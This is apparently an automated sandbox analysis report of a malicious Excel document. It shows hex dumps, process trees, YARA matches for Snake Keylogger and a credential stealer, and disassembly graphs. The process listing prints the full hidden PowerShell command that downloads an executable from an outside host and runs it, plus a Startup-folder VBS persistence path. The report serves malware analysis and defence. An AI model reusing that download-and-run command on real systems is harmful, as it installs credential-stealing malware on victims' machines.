                                                                                              2024-11-25 13:58:09 UTC1369INData Raw: 04 2a 22 02 03 7d 6a 00 00 04 2a 1e 02 7b 69 00 00 04 2a 22 02 03 7d 69 00 00 04 2a 4a 02 22 00 00 80 3f 7d 6a 00 00 04 02 28 08 01 00 06 2a 4e 02 22 00 00 80 3f 7d 6a 00 00 04 02 03 28 09 01 00 06 2a 86 02 22 00 00 80 3f 7d 6a 00 00 04 02 03 28 09 01 00 06 02 04 7d 6a 00 00 04 02 05 7d 69 00 00 04 2a 8a 02 7b 57 00 00 04 74 16 00 00 02 03 04 05 6f 87 00 00 06 02 7b 6a 00 00 04 5a 02 7b 69 00 00 04 58 2a 1e 02 7b 6c 00 00 04 2a 22 02 03 7d 6c 00 00 04 2a 4e 02 18 73 68 00 00 0a 7d 6b 00 00 04 02 28 08 01 00 06 2a 52 02 18 73 68 00 00 0a 7d 6b 00 00 04 02 03 28 09 01 00 06 2a 6e 02 18 73 68 00 00 0a 7d 6b 00 00 04 02 03 28 09 01 00 06 02 04 7d 6c 00 00 04 2a ea 02 7b 6b 00 00 04 03 6f 69 00 00 0a 39 16 00 00 00 72 d7 04 00 70 03 8c 38 00 00 01 28 6a 00 00
                                                                                              Data Ascii: *"}j*{i*"}i*J"?}j(*N"?}j(*"?}j(}j}i*{Wto{jZ{iX*{l*"}l*Nsh}k(*Rsh}k(*nsh}k(}l*{koi9rp8(j
                                                                                              2024-11-25 13:58:09 UTC1369INData Raw: 7b b3 00 00 04 58 02 7b b2 00 00 04 58 7e af 00 00 04 6f 77 00 00 0a 61 7d b0 00 00 04 2a 92 02 28 b3 01 00 06 02 03 7d b4 00 00 04 02 04 7d b3 00 00 04 02 05 7d b2 00 00 04 02 0e 04 7d b1 00 00 04 2a 9e 02 28 b3 01 00 06 02 03 7d b4 00 00 04 02 04 7d b3 00 00 04 02 05 7d b2 00 00 04 02 20 ff 00 00 00 7d b1 00 00 04 2a 2a 02 03 04 17 28 b7 01 00 06 2a 2a 02 03 04 16 28 b7 01 00 06 2a f6 02 6f a9 01 00 06 02 6f a7 01 00 06 02 6f a5 01 00 06 28 7a 00 00 0a 28 7a 00 00 0a 02 6f a9 01 00 06 02 6f a7 01 00 06 02 6f a5 01 00 06 28 7a 00 00 0a 28 7b 00 00 0a 58 18 5b d2 2a 62 02 6f a9 01 00 06 02 6f a7 01 00 06 58 02 6f a5 01 00 06 58 19 5b d2 2a ae 22 3d 0a 57 3e 02 6f a9 01 00 06 6b 5a 22 8f c2 35 3f 02 6f a7 01 00 06 6b 5a 58 22 29 5c 8f 3d 02 6f a5 01 00 06
                                                                                              Data Ascii: {X{X~owa}*(}}}}*(}}} }**(**(*ooo(z(zooo(z({X[*booXoX[*"=W>okZ"5?okZX")\=o


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:08:58:01
                                                                                              Start date:25/11/2024
                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                              Imagebase:0x13f5d0000
                                                                                              File size:28'253'536 bytes
                                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:08:58:03
                                                                                              Start date:25/11/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
                                                                                              Imagebase:0x13f100000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:08:58:11
                                                                                              Start date:25/11/2024
                                                                                              Path:C:\Users\user\AppData\Local\Temp\tmp667.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\tmp667.exe"
                                                                                              Imagebase:0x1180000
                                                                                              File size:1'072'096 bytes
                                                                                              MD5 hash:2ED7362E959D42385D4E6D231A6840DD
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.451714574.00000000048B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 68%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:08:58:33
                                                                                              Start date:25/11/2024
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
                                                                                              Imagebase:0xff930000
                                                                                              File size:168'960 bytes
                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:8
                                                                                              Start time:08:58:35
                                                                                              Start date:25/11/2024
                                                                                              Path:C:\Users\user\AppData\Roaming\svcost.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\svcost.exe"
                                                                                              Imagebase:0xe00000
                                                                                              File size:262'244'634 bytes
                                                                                              MD5 hash:E3902A9C7AC3C2180B535F81DA7CD147
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Executed Functions

                                                                                                Function 000007FE8B910A9A Relevance: .3, Instructions: 276COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.385198960.000007FE8B910000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B910000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7fe8b910000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 21e84d70754dfea9a9356b5df68d3a6ed1a30d16295465fa7db9b9679a4aa17e
                                                                                                • Instruction ID: 03251d4dc9fa3400e07990ecdc4c048a787bfe0b3d6beb480083735f138be7c6
                                                                                                • Opcode Fuzzy Hash: 21e84d70754dfea9a9356b5df68d3a6ed1a30d16295465fa7db9b9679a4aa17e
                                                                                                • Instruction Fuzzy Hash: 6881DF2060DACA4FEB56A73C94147B5BFE1EF8A258F1800EBD08DC71B3DA199C56C351

                                                                                                Execution Graph

                                                                                                Execution Coverage:10.3%
                                                                                                Dynamic/Decrypted Code Coverage:95.2%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:62
                                                                                                Total number of Limit Nodes:4
                                                                                                execution_graph 51537 498ef08 51538 498ef4c VirtualAlloc 51537->51538 51540 498efb9 51538->51540 51548 1c88c8 51549 1c88e5 51548->51549 51550 1c88f5 51549->51550 51555 498244d 51549->51555 51558 4987a1d 51549->51558 51562 498a647 51549->51562 51565 4984cd6 51549->51565 51569 498d840 51555->51569 51559 4987a3c 51558->51559 51561 498d840 VirtualProtect 51559->51561 51560 49801de 51561->51560 51564 498d840 VirtualProtect 51562->51564 51563 49801de 51564->51563 51566 4984cf5 51565->51566 51568 498d840 VirtualProtect 51566->51568 51567 4984d1a 51568->51567 51571 498d867 51569->51571 51573 498dd40 51571->51573 51574 498dd89 VirtualProtect 51573->51574 51576 49801de 51574->51576 51541 424288 51542 42429b LdrInitializeThunk 51541->51542 51544 d5679e 51545 d564a2 51544->51545 51546 6fbf08 SleepEx 51545->51546 51547 6fbf18 SleepEx 51545->51547 51546->51545 51547->51545 51577 13d048 51578 13d060 51577->51578 51579 13d0bb 51578->51579 51581 498e428 51578->51581 51582 498e481 51581->51582 51585 498e9b8 51582->51585 51583 498e4b6 51586 498e9e5 51585->51586 51587 498d840 VirtualProtect 51586->51587 51589 498eb7b 51586->51589 51588 498eb6c 51587->51588 51588->51583 51589->51583 51507 d566db 51508 d564a2 51507->51508 51511 6fbf08 51508->51511 51516 6fbf18 51508->51516 51512 6fbf18 51511->51512 51521 6fbf49 51512->51521 51525 6fbf58 51512->51525 51513 6fbf43 51513->51508 51517 6fbf2d 51516->51517 51519 6fbf49 SleepEx 51517->51519 51520 6fbf58 SleepEx 51517->51520 51518 6fbf43 51518->51508 51519->51518 51520->51518 51522 6fbf58 51521->51522 51523 6fc0ef 51522->51523 51529 6ff847 51522->51529 51523->51513 51527 6fbf82 51525->51527 51526 6fc0ef 51526->51513 51527->51526 51528 6ff847 SleepEx 51527->51528 51528->51527 51530 6ff86d 51529->51530 51533 6ff710 51530->51533 51534 6ff754 SleepEx 51533->51534 51536 6ff7b4 51534->51536 51536->51522

                                                                                                Executed Functions

                                                                                                Function 006BF0E8 Relevance: 19.4, Strings: 15, Instructions: 618COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 6bf0e8-6bf109 1 6bf10b 0->1 2 6bf110-6bf1a0 call 6bfc50 0->2 1->2 7 6bf1a6-6bf1f3 2->7 10 6bf202 7->10 11 6bf1f5-6bf200 7->11 12 6bf20c-6bf327 10->12 11->12 23 6bf339-6bf364 12->23 24 6bf329-6bf32f 12->24 25 6bfb30-6bfb4c 23->25 24->23 26 6bf369-6bf4cc call 6bdf00 25->26 27 6bfb52-6bfb6d 25->27 38 6bf4de-6bf673 call 6bb680 call 6b8ab0 26->38 39 6bf4ce-6bf4d4 26->39 51 6bf6d8-6bf6e2 38->51 52 6bf675-6bf679 38->52 39->38 55 6bf909-6bf928 51->55 53 6bf67b-6bf67c 52->53 54 6bf681-6bf6d3 52->54 56 6bf9ae-6bfa19 53->56 54->56 57 6bf92e-6bf958 55->57 58 6bf6e7-6bf82d call 6bdf00 55->58 75 6bfa2b-6bfa76 56->75 76 6bfa1b-6bfa21 56->76 64 6bf9ab-6bf9ac 57->64 65 6bf95a-6bf9a8 57->65 87 6bf833-6bf8ff call 6bdf00 58->87 88 6bf902-6bf903 58->88 64->56 65->64 78 6bfa7c-6bfb14 75->78 79 6bfb15-6bfb2d 75->79 76->75 78->79 79->25 87->88 88->55
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: f"p$8$l$$l$$l$$l$$l$$x$$x$$x$$$$$$$$$$oV
                                                                                                • API String ID: 0-1405324388
                                                                                                • Opcode ID: 8eed91ea7c7176567b673d7b1b705cce18daeff38c1c5cbe0abf467529ddf862
                                                                                                • Instruction ID: dc2c6e6e192430bbe9bc0c358f548a1d5b2b6717cff2655908d677568127ec12
                                                                                                • Opcode Fuzzy Hash: 8eed91ea7c7176567b673d7b1b705cce18daeff38c1c5cbe0abf467529ddf862
                                                                                                • Instruction Fuzzy Hash: F052D475E00629CFDB64DF69C890AD9B7B6FF89300F1085AAD909A7355DB30AE81CF50
                                                                                                Function 006BF0D8 Relevance: 7.7, Strings: 6, Instructions: 187COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 226 6bf0d8-6bf0e4 227 6bf0a9-6bf0b5 226->227 228 6bf0e6-6bf109 226->228 230 6bf0bc-6bf0c5 227->230 231 6bf0b7 227->231 232 6bf10b 228->232 233 6bf110-6bf1a0 call 6bfc50 228->233 328 6bf0c8 call 6bf0e8 230->328 329 6bf0c8 call 6bf0d8 230->329 231->230 232->233 240 6bf1a6-6bf1f3 233->240 236 6bf0ca-6bf0d3 243 6bf202 240->243 244 6bf1f5-6bf200 240->244 245 6bf20c-6bf327 243->245 244->245 256 6bf339-6bf364 245->256 257 6bf329-6bf32f 245->257 258 6bfb30-6bfb4c 256->258 257->256 259 6bf369-6bf4cc call 6bdf00 258->259 260 6bfb52-6bfb6d 258->260 271 6bf4de-6bf673 call 6bb680 call 6b8ab0 259->271 272 6bf4ce-6bf4d4 259->272 284 6bf6d8-6bf6e2 271->284 285 6bf675-6bf679 271->285 272->271 288 6bf909-6bf928 284->288 286 6bf67b-6bf67c 285->286 287 6bf681-6bf6d3 285->287 289 6bf9ae-6bfa19 286->289 287->289 290 6bf92e-6bf958 288->290 291 6bf6e7-6bf82d call 6bdf00 288->291 308 6bfa2b-6bfa76 289->308 309 6bfa1b-6bfa21 289->309 297 6bf9ab-6bf9ac 290->297 298 6bf95a-6bf9a8 290->298 320 6bf833-6bf8ff call 6bdf00 291->320 321 6bf902-6bf903 291->321 297->289 298->297 311 6bfa7c-6bfb14 308->311 312 6bfb15-6bfb2d 308->312 309->308 311->312 312->258 320->321 321->288 328->236 329->236
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: f"p$h$x$$x$$x$$oV
                                                                                                • API String ID: 0-1822689336
                                                                                                • Opcode ID: e25e3d563dc70a3d4a25157fc17289da7a20f58ce5d0746958116f0be3bc9783
                                                                                                • Instruction ID: 19b3539cede45b79c0b7aa4fcf156c6f823ab0f3d66bbbb7fcd6619ec6f1df0b
                                                                                                • Opcode Fuzzy Hash: e25e3d563dc70a3d4a25157fc17289da7a20f58ce5d0746958116f0be3bc9783
                                                                                                • Instruction Fuzzy Hash: C4810475E00628DFEB64DF69D850AD9B7B2FF89300F1082AAD419A7355DB306E81CF50
                                                                                                Function 006D0040 Relevance: 7.6, Strings: 5, Instructions: 1335COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 331 6d0040-6d006e 332 6d0075-6d0197 331->332 333 6d0070 331->333 337 6d0199-6d01b5 call 6d2bc0 332->337 338 6d01bb-6d01c7 332->338 333->332 337->338 339 6d01ce-6d01d3 338->339 340 6d01c9 338->340 341 6d020b-6d0254 339->341 342 6d01d5-6d01e1 339->342 340->339 353 6d025b-6d0520 341->353 354 6d0256 341->354 344 6d01e8-6d0206 342->344 345 6d01e3 342->345 346 6d196f-6d1975 344->346 345->344 348 6d1977-6d1997 346->348 349 6d19a0 346->349 348->349 352 6d19a1 349->352 352->352 379 6d0f50-6d0f5c 353->379 354->353 380 6d0525-6d0531 379->380 381 6d0f62-6d0f9a 379->381 382 6d0538-6d065d 380->382 383 6d0533 380->383 390 6d1074-6d107a 381->390 417 6d069d-6d0726 382->417 418 6d065f-6d0697 382->418 383->382 391 6d0f9f-6d101c 390->391 392 6d1080-6d10b8 390->392 407 6d104f-6d1071 391->407 408 6d101e-6d1022 391->408 402 6d1416-6d141c 392->402 404 6d10bd-6d12bf 402->404 405 6d1422-6d146a 402->405 499 6d135e-6d1362 404->499 500 6d12c5-6d1359 404->500 415 6d146c-6d14df 405->415 416 6d14e5-6d1530 405->416 407->390 408->407 412 6d1024-6d104c 408->412 412->407 415->416 437 6d1939-6d193f 416->437 444 6d0728-6d0730 417->444 445 6d0735-6d07b9 417->445 418->417 440 6d1535-6d15b7 437->440 441 6d1945-6d196d 437->441 459 6d15df-6d15eb 440->459 460 6d15b9-6d15d4 440->460 441->346 448 6d0f41-6d0f4d 444->448 480 6d07c8-6d084c 445->480 481 6d07bb-6d07c3 445->481 448->379 461 6d15ed 459->461 462 6d15f2-6d15fe 459->462 460->459 461->462 466 6d1611-6d1620 462->466 467 6d1600-6d160c 462->467 468 6d1629-6d1901 466->468 469 6d1622 466->469 471 6d1920-6d1936 467->471 502 6d190c-6d1918 468->502 469->468 472 6d169d-6d1715 469->472 473 6d162f-6d1698 469->473 474 6d1788-6d17f1 469->474 475 6d171a-6d1783 469->475 476 6d17f6-6d185e 469->476 471->437 472->502 473->502 474->502 475->502 510 6d18d2-6d18d8 476->510 524 6d084e-6d0856 480->524 525 6d085b-6d08df 480->525 481->448 505 6d13bf-6d13fc 499->505 506 6d1364-6d13bd 499->506 522 6d13fd-6d1413 500->522 502->471 505->522 506->522 515 6d18da-6d18e4 510->515 516 6d1860-6d18be 510->516 515->502 529 6d18c5-6d18cf 516->529 530 6d18c0 516->530 522->402 524->448 537 6d08ee-6d0972 525->537 538 6d08e1-6d08e9 525->538 529->510 530->529 544 6d0974-6d097c 537->544 545 6d0981-6d0a05 537->545 538->448 544->448 551 6d0a14-6d0a98 545->551 552 6d0a07-6d0a0f 545->552 558 6d0a9a-6d0aa2 551->558 559 6d0aa7-6d0b2b 551->559 552->448 558->448 565 6d0b2d-6d0b35 559->565 566 6d0b3a-6d0bbe 559->566 565->448 572 6d0bcd-6d0c51 566->572 573 6d0bc0-6d0bc8 566->573 579 6d0c60-6d0ce4 572->579 580 6d0c53-6d0c5b 572->580 573->448 586 6d0ce6-6d0cee 579->586 587 6d0cf3-6d0d77 579->587 580->448 586->448 593 6d0d79-6d0d81 587->593 594 6d0d86-6d0e0a 587->594 593->448 600 6d0e0c-6d0e14 594->600 601 6d0e19-6d0e9d 594->601 600->448 607 6d0eac-6d0f30 601->607 608 6d0e9f-6d0ea7 601->608 614 6d0f3c-6d0f3e 607->614 615 6d0f32-6d0f3a 607->615 608->448 614->448 615->448
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0l$$2$H<$$Lk$$oV
                                                                                                • API String ID: 0-3967312034
                                                                                                • Opcode ID: 18e580380a3964de137f4de4ed1ab8cb18d9426244c5efd696987a4243cc51c3
                                                                                                • Instruction ID: 80e4eb23cfb6aeb7cba85e7ed430aa3bfb6f7dc0f77b270e44fbb9491db1b327
                                                                                                • Opcode Fuzzy Hash: 18e580380a3964de137f4de4ed1ab8cb18d9426244c5efd696987a4243cc51c3
                                                                                                • Instruction Fuzzy Hash: 2CE2D774E046288FDB65EF68D98479DB7B6FB89301F1081EAE409A7395DB709E81CF40
                                                                                                Function 00D5C020 Relevance: 6.2, Strings: 4, Instructions: 1177COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,!p$4$8kM$fM
                                                                                                • API String ID: 0-3818114213
                                                                                                • Opcode ID: f275a7e442a8790ab7a9866efeb336c9f94733359e8205de2dde7cf00d1846b7
                                                                                                • Instruction ID: 324daa5c7418a632e5651ae0b565efd54c2647c04be3affae0ddb9b8127da923
                                                                                                • Opcode Fuzzy Hash: f275a7e442a8790ab7a9866efeb336c9f94733359e8205de2dde7cf00d1846b7
                                                                                                • Instruction Fuzzy Hash: 12B2F734A10218DFDB14DFA4C894BADB7B6FF88701F1491A6E905AB3A5DB70AC45CF60
                                                                                                Function 001CCAD8 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1026 1ccad8-1ccaf9 1027 1ccafb 1026->1027 1028 1ccb00-1ccbe7 1026->1028 1027->1028 1030 1ccbed-1ccd2e call 1c9028 1028->1030 1031 1cd2e9-1cd311 1028->1031 1077 1ccd34-1ccd8f 1030->1077 1078 1cd2b2-1cd2dc 1030->1078 1034 1cda17-1cda20 1031->1034 1036 1cd31f-1cd329 1034->1036 1037 1cda26-1cda3d 1034->1037 1039 1cd32b 1036->1039 1040 1cd330-1cd424 call 1c9028 1036->1040 1039->1040 1059 1cd44e 1040->1059 1060 1cd426-1cd432 1040->1060 1064 1cd454-1cd474 1059->1064 1062 1cd43c-1cd442 1060->1062 1063 1cd434-1cd43a 1060->1063 1065 1cd44c 1062->1065 1063->1065 1068 1cd4d4-1cd554 1064->1068 1069 1cd476-1cd4cf 1064->1069 1065->1064 1091 1cd5ab-1cd5ee call 1c9028 1068->1091 1092 1cd556-1cd5a9 1068->1092 1081 1cda14 1069->1081 1085 1ccd94-1ccd9f 1077->1085 1086 1ccd91 1077->1086 1088 1cd2de 1078->1088 1089 1cd2e6 1078->1089 1081->1034 1090 1cd1c7-1cd1cd 1085->1090 1086->1085 1088->1089 1089->1031 1094 1ccda4-1ccdc2 1090->1094 1095 1cd1d3-1cd24f call 1c84f0 1090->1095 1117 1cd5f9-1cd602 1091->1117 1092->1117 1097 1cce19-1cce2e 1094->1097 1098 1ccdc4-1ccdc8 1094->1098 1137 1cd29c-1cd2a2 1095->1137 1101 1cce35-1cce4b 1097->1101 1102 1cce30 1097->1102 1098->1097 1103 1ccdca-1ccdd5 1098->1103 1106 1cce4d 1101->1106 1107 1cce52-1cce69 1101->1107 1102->1101 1108 1cce0b-1cce11 1103->1108 1106->1107 1113 1cce6b 1107->1113 1114 1cce70-1cce86 1107->1114 1111 1ccdd7-1ccddb 1108->1111 1112 1cce13-1cce14 1108->1112 1118 1ccddd 1111->1118 1119 1ccde1-1ccdf9 1111->1119 1116 1cce97-1ccf02 1112->1116 1113->1114 1120 1cce8d-1cce94 1114->1120 1121 1cce88 1114->1121 1122 1ccf04-1ccf10 1116->1122 1123 1ccf16-1cd0cb 1116->1123 1125 1cd662-1cd671 1117->1125 1118->1119 1126 1ccdfb 1119->1126 1127 1cce00-1cce08 1119->1127 1120->1116 1121->1120 1122->1123 1135 1cd0cd-1cd0d1 1123->1135 1136 1cd12f-1cd144 1123->1136 1128 1cd604-1cd62c 1125->1128 1129 1cd673-1cd6fb 1125->1129 1126->1127 1127->1108 1132 1cd62e 1128->1132 1133 1cd633-1cd65c 1128->1133 1164 1cd874-1cd880 1129->1164 1132->1133 1133->1125 1135->1136 1142 1cd0d3-1cd0e2 1135->1142 1140 1cd14b-1cd16c 1136->1140 1141 1cd146 1136->1141 1138 1cd2a4-1cd2aa 1137->1138 1139 1cd251-1cd299 1137->1139 1138->1078 1139->1137 1144 1cd16e 1140->1144 1145 1cd173-1cd192 1140->1145 1141->1140 1147 1cd121-1cd127 1142->1147 1144->1145 1148 1cd199-1cd1b9 1145->1148 1149 1cd194 1145->1149 1151 1cd129-1cd12a 1147->1151 1152 1cd0e4-1cd0e8 1147->1152 1158 1cd1bb 1148->1158 1159 1cd1c0 1148->1159 1149->1148 1154 1cd1c4 1151->1154 1156 1cd0ea-1cd0ee 1152->1156 1157 1cd0f2-1cd113 1152->1157 1154->1090 1156->1157 1160 1cd11a-1cd11e 1157->1160 1161 1cd115 1157->1161 1158->1159 1159->1154 1160->1147 1161->1160 1166 1cd886-1cd8e1 1164->1166 1167 1cd700-1cd709 1164->1167 1182 1cd918-1cd942 1166->1182 1183 1cd8e3-1cd916 1166->1183 1168 1cd70b 1167->1168 1169 1cd712-1cd868 1167->1169 1168->1169 1171 1cd75d-1cd79d 1168->1171 1172 1cd718-1cd758 1168->1172 1173 1cd7e7-1cd827 1168->1173 1174 1cd7a2-1cd7e2 1168->1174 1186 1cd86e 1169->1186 1171->1186 1172->1186 1173->1186 1174->1186 1191 1cd94b-1cd9de 1182->1191 1183->1191 1186->1164 1195 1cd9e5-1cda05 1191->1195 1195->1081
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.445795160.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_1c0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$$TJ"p$p!p$xb p
                                                                                                • API String ID: 0-2213208798
                                                                                                • Opcode ID: a461a2d92671d3b6391c3b0abc17cd5124b458caf31463be8b712547f2e64fab
                                                                                                • Instruction ID: b0686a9ee6603ebe2c2554fea711c1b28de61c3267ee0d489417cd58612ff7c3
                                                                                                • Opcode Fuzzy Hash: a461a2d92671d3b6391c3b0abc17cd5124b458caf31463be8b712547f2e64fab
                                                                                                • Instruction Fuzzy Hash: AAA2A575A00228CFDB64DF69C984B9DBBB2BF89304F1581E9D509AB325D731AE81CF40
                                                                                                Function 00D5C347 Relevance: 5.5, Strings: 4, Instructions: 495COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
